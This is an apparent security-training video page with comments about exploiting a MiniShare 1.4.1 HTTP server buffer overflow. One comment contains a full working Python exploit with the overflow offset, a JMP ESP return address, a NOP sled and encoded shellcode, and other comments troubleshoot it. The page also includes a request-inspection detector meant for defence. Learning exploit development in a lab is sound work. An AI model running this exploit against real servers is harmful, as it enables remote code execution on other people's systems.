Description:
Welcome to Part 4 of the Exploit Research Megaprimer.
Please begin this series by watching Part 1, if you have not already done so! In this video, we will look at how to exploit a buffer overflow which was disclosed on Exploit-DB: Minishare 1.4.1 Buffer Overflow. You can download the Minishare program and follow along with this video.
We will first start by understanding the vulnerability from its description on Exploit-DB and then reproduce it in our lab setup. After this, we will use the Immunity Debugger to examine the exploit conditions, find the offsets for the RET and ESP overwrite, find the bad characters (0x00 and 0x0D), create shellcode for the payload encoded to avoid these bad characters, create the exploit program and finally exploit the program! This whole journey is 30 minutes long, so fasten your seat belts and take out your debuggers :)
Hope you enjoy this video! Please do leave your comments behind.
Tags: basics
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.
Comments:
The weekend is almost over but thanks anyway! :D
Great video man, Vivek, keep them coming.
Paused the vid and exploited it myself with everything I learned from the previous videos. Feels good.
Very good! I like it.
Dear sir,
thanks for such an amazing video,
but I'm facing a problem:
my ESP and EIP are pointing to the same location,
01583900.
Please help me.
#!/usr/bin/python
# my script (Python 2: str is a byte string, so the \x.. escapes are sent as raw bytes)
import socket, sys

if len(sys.argv) != 2:
    sys.stderr.write("usage: %s <target ip>\n" % sys.argv[0])
    sys.exit(1)

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((sys.argv[1], 80))

buffer = "GET "
# cyclic pattern (pattern_create 2000) used earlier to locate the EIP offset
#buffer += "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co"
buffer += "A" * 1787            # padding up to the saved return address (offset 1787)
#buffer += "\x53\x93\x42\x7e"   # alternate JMP ESP address, commented out
buffer += "\x87\xa7\xa7\x7c"    # address of a JMP ESP instruction, overwrites EIP
#buffer += "BBBB"               # marker used to confirm EIP control
buffer += "\x90" * 20           # NOP sled in front of the payload
# encoded payload; the parentheses make Python join the adjacent string literals
buffer += (
    "\xd9\xc9\xbd\x67\xfc\x15\x09\xd9\x74\x24\xf4\x5f\x33\xc9\xb1"
    "\x56\x83\xef\xfc\x31\x6f\x14\x03\x6f\x73\x1e\xe0\xf5\x93\x57"
    "\x0b\x06\x63\x08\x85\xe3\x52\x1a\xf1\x60\xc6\xaa\x71\x24\xea"
    "\x41\xd7\xdd\x79\x27\xf0\xd2\xca\x82\x26\xdc\xcb\x22\xe7\xb2"
    "\x0f\x24\x9b\xc8\x43\x86\xa2\x02\x96\xc7\xe3\x7f\x58\x95\xbc"
    "\xf4\xca\x0a\xc8\x49\xd6\x2b\x1e\xc6\x66\x54\x1b\x19\x12\xee"
    "\x22\x4a\x8a\x65\x6c\x72\xa1\x22\x4d\x83\x66\x31\xb1\xca\x03"
    "\x82\x41\xcd\xc5\xda\xaa\xff\x29\xb0\x94\xcf\xa4\xc8\xd1\xe8"
    "\x56\xbf\x29\x0b\xeb\xb8\xe9\x71\x37\x4c\xec\xd2\xbc\xf6\xd4"
    "\xe3\x11\x60\x9e\xe8\xde\xe6\xf8\xec\xe1\x2b\x73\x08\x6a\xca"
    "\x54\x98\x28\xe9\x70\xc0\xeb\x90\x21\xac\x5a\xac\x32\x08\x03"
    "\x08\x38\xbb\x50\x2a\x63\xd4\x95\x01\x9c\x24\xb1\x12\xef\x16"
    "\x1e\x89\x67\x1b\xd7\x17\x7f\x5c\xc2\xe0\xef\xa3\xec\x10\x39"
    "\x60\xb8\x40\x51\x41\xc0\x0a\xa1\x6e\x15\x9c\xf1\xc0\xc5\x5d"
    "\xa2\xa0\xb5\x35\xa8\x2e\xea\x26\xd3\xe4\x9d\x60\x1d\xdc\xce"
    "\x06\x5c\xe2\xe1\x8a\xe9\x04\x6b\x23\xbc\x9f\x03\x81\x9b\x17"
    "\xb4\xfa\xc9\x0b\x6d\x6d\x45\x42\xa9\x92\x56\x40\x9a\x3f\xfe"
    "\x03\x68\x2c\x3b\x35\x6f\x79\x6b\x3c\x48\xea\xe1\x50\x1b\x8a"
    "\xf6\x78\xcb\x2f\x64\xe7\x0b\x39\x95\xb0\x5c\x6e\x6b\xc9\x08"
    "\x82\xd2\x63\x2e\x5f\x82\x4c\xea\x84\x77\x52\xf3\x49\xc3\x70"
    "\xe3\x97\xcc\x3c\x57\x48\x9b\xea\x01\x2e\x75\x5d\xfb\xf8\x2a"
    "\x37\x6b\x7c\x01\x88\xed\x81\x4c\x7e\x11\x33\x39\xc7\x2e\xfc"
    "\xad\xcf\x57\xe0\x4d\x2f\x82\xa0\x7e\x7a\x8e\x81\x16\x23\x5b"
    "\x90\x7a\xd4\xb6\xd7\x82\x57\x32\xa8\x70\x47\x37\xad\x3d\xcf"
    "\xa4\xdf\x2e\xba\xca\x4c\x4e\xef"
)
buffer += "HTTP/1.1\r\n\r\n"   # terminate the request line so the server parses it
#buffer +="\xbd\xbd\x4e\xfa\x92\xdb\xce\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1\x49\x31\x6a\x14\x83\xea\xfc\x03\x6a\x10\x5f\xbb\x06\x7a\x16\x44\xf7\x7b\x48\xcc\x12\x4a\x5a\xaa\x57\xff\x6a\xb8\x3a\x0c\x01\xec\xae\x87\x67\x39\xc0\x20\xcd\x1f\xef\xb1\xe0\x9f\xa3\x72\x63\x5c\xbe\xa6\x43\x5d\x71\xbb\x82\x9a\x6c\x34\xd6\x73\xfa\xe7\xc6\xf0\xbe\x3b\xe7\xd6\xb4\x04\x9f\x53\x0a\xf0\x15\x5d\x5b\xa9\x22\x15\x43\xc1\x6c\x86\x72\x06\x6f\xfa\x3d\x23\x5b\x88\xbf\xe5\x92\x71\x8e\xc9\x78\x4c\x3e\xc4\x81\x88\xf9\x37\xf4\xe2\xf9\xca\x0e\x31\x83\x10\x9b\xa4\x23\xd2\x3b\x0d\xd5\x37\xdd\xc6\xd9\xfc\xaa\x81\xfd\x03\x7f\xba\xfa\x88\x7e\x6d\x8b\xcb\xa4\xa9\xd7\x88\xc5\xe8\xbd\x7f\xfa\xeb\x1a\xdf\x5e\x67\x88\x34\xd8\x2a\xc5\xf9\xd6\xd4\x15\x96\x61\xa6\x27\x39\xd9\x20\x04\xb2\xc7\xb7\x6b\xe9\xbf\x28\x92\x12\xbf\x61\x51\x46\xef\x19\x70\xe7\x64\xda\x7d\x32\x2a\x8a\xd1\xed\x8a\x7a\x92\x5d\x62\x91\x1d\x81\x92\x9a\xf7\xaa\x38\x60\x90\xab\xbc\x6a\x61\x3c\xbe\x6a\x70\xe0\x37\x8c\x18\x08\x11\x06\xb5\xb1\x38\xdc\x24\x3d\x97\x98\x67\xb5\x1b\x5c\x29\x3e\x56\x4e\xde\xce\x2d\x2c\x49\xd0\x98\x5b\x76\x44\x26\xca\x21\xf0\x24\x2b\x05\x5f\xd7\x1e\x1d\x56\x4d\xe1\x4\x97\x81\xe1\x8a\xc1\xcb\xe1\xe2\xb5\xaf\xb1\x17\xba\x7a\xa6\x8b\x2f\x84\x9f\x78\xe7\xec\x1d\xa6\xcf\xb3\xde\x8d\xd1\x88\x08\xe8\x57\xf8\x3e\x18\x94"
sock.send(buffer)
sock.close()
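As an added defensive example (not code from the video or from any commenter's script): a small inspector that flags HTTP requests shaped like the one the script above sends, i.e. an oversized GET request line carrying non-printable bytes, a run of 0x90 NOPs and a long padding run. The thresholds and the two sample requests are constructed assumptions, not values from the page.

```python
import re

# Thresholds are illustrative assumptions, not values from the video or the posted script.
MAX_REQUEST_LINE = 1024   # sane URLs are far shorter; the MiniShare crash needs 1787+ bytes
NOP_RUN = 8               # this many consecutive 0x90 bytes is treated as a NOP sled
PAD_RUN = 256             # this many repeats of one byte is treated as overflow padding
PRINTABLE = set(range(0x21, 0x7f))

REQUEST_LINE_RE = re.compile(rb"^(\S+) (.*?)(?: (HTTP/\d\.\d))?$", re.S)
NOP_SLED_RE = re.compile(rb"\x90{%d,}" % NOP_RUN)
PAD_RE = re.compile(rb"(.)\1{%d,}" % (PAD_RUN - 1), re.S)


def inspect_request(raw):
    """Return a list of findings for one raw HTTP request given as bytes.

    An empty list means nothing about the request looks like an overflow attempt.
    """
    findings = []
    end = raw.find(b"\r\n")
    request_line = raw if end < 0 else raw[:end]
    if len(request_line) > MAX_REQUEST_LINE:
        findings.append("oversized request line (%d bytes)" % len(request_line))
    m = REQUEST_LINE_RE.match(request_line)
    target = m.group(2) if m else b""
    bad = sorted({b for b in target if b not in PRINTABLE})
    if bad:
        findings.append("non-printable bytes in request-target: "
                        + ", ".join("0x%02x" % b for b in bad[:8]))
    if NOP_SLED_RE.search(raw):
        findings.append("NOP sled (run of 0x90) in request")
    pad = PAD_RE.search(raw)
    if pad:
        findings.append("%d-byte run of repeated byte 0x%02x"
                        % (len(pad.group(0)), pad.group(1)[0]))
    return findings


# Constructed samples: a normal request and one shaped like the posted script's
# buffer ("GET " + 1787 bytes of padding + 4-byte return address + NOP sled +
# payload + "HTTP/1.1"). "BBBB" and the 0x80..0xa7 bytes are stand-ins, not a
# real address or payload.
BENIGN = b"GET /index.html HTTP/1.1\r\nHost: example\r\n\r\n"
OVERFLOW_SHAPED = (b"GET " + b"A" * 1787 + b"BBBB" + b"\x90" * 20
                   + bytes(range(0x80, 0xa8)) + b"HTTP/1.1\r\n\r\n")

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("overflow-shaped", OVERFLOW_SHAPED)):
        print(name, inspect_request(req) or "clean")
```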
Hi sir, my problem got solved, thanks. I was making some silly mistake.
Hey,
Great videos, highly professional.
One small correction, the first JMP ESP was from shell.dll the second from user32.dll :-)
Very nice video!! But the sound is awful :(
Thanks for the amazing video series! It has been extremely informative for me. I just have a quick question about the exploit. Why is the NOP slide necessary in this case? I would think that if I change EIP to point to a location that executes a JMP ESP instruction, it would do just that: jump to ESP. If I remove the NOP slide from the exploit, the program crashes. If my shellcode is located where ESP points to, should it not just work without the NOPs? Is it that ESP is being changed after the overflow and no longer points directly to my shellcode? This has been somewhat confusing for me. Thanks again for the video and any clarification of this for me; I really do appreciate the amount of work you have put into these videos and I'll be watching all of them!
Hi, great megaprimer!! I love it, but I have two questions:
Question 1: the same as "elitedev" on Sun 08 Jul 2012.
Question 2: Why are there 20 NOPs (buffer +="\x90"*20)??
Thanks :)
Thanks Vivek, nice tutorial.
Can you please update the link for Minishare 1.4.1, as the SourceForge link is dead and I am unable to find one online.
Hey,
For all those people struggling to find minishare 1.4.1 here is the link
http://heapoverflow.com/f0rums/projects/exploits/07-minishare-http-server-buffer-overflow/downloads/vulnapp.zip
Thanks to heapoverflow for hosting this file.
Thanks Vivek, great video again. I have the same question as others though. I was able to code this entire exploit in advance of starting the video, except that it was failing because I was missing these NOPs. If ESP is 4 bytes after EIP, then after writing "GET " followed by 1787 As, followed by the 4-byte EIP, surely the shellcode should then follow immediately after, as 'jmp esp' should jump to the top of the stack, and not 'roughly' the top of the stack? Without NOPs, the exploit fails, but with 5 NOPs, it succeeds. Why please??
Thanks a lot for the Minishare link by gh0st. Had a hell of a time finding it. Thanks. I have now uploaded this file here:
http://www.mirrorcreator.com/files/V3DICQBI/minishare-1.4.1.rar_links
Hi to all. Thanks for the lesson :)
Just one question: what is the difference between the shell32.dll jmp esp and the user32.dll jmp esp? With the last it works well, and with the first it doesn't work.
Thanks for all the exploit research videos. I have just a quick question about the Minishare exploit.
I am using Windows XP SP2 for this tutorial. I found my offset at 1787; after that I overwrote my EIP with an address in shell32.dll which contains a JMP ESP instruction. Then I added some 20 NOPs, and after that I added my shellcode. My program is crashing after 1787 but my shellcode is not executing; I also removed the bad characters. Please help me?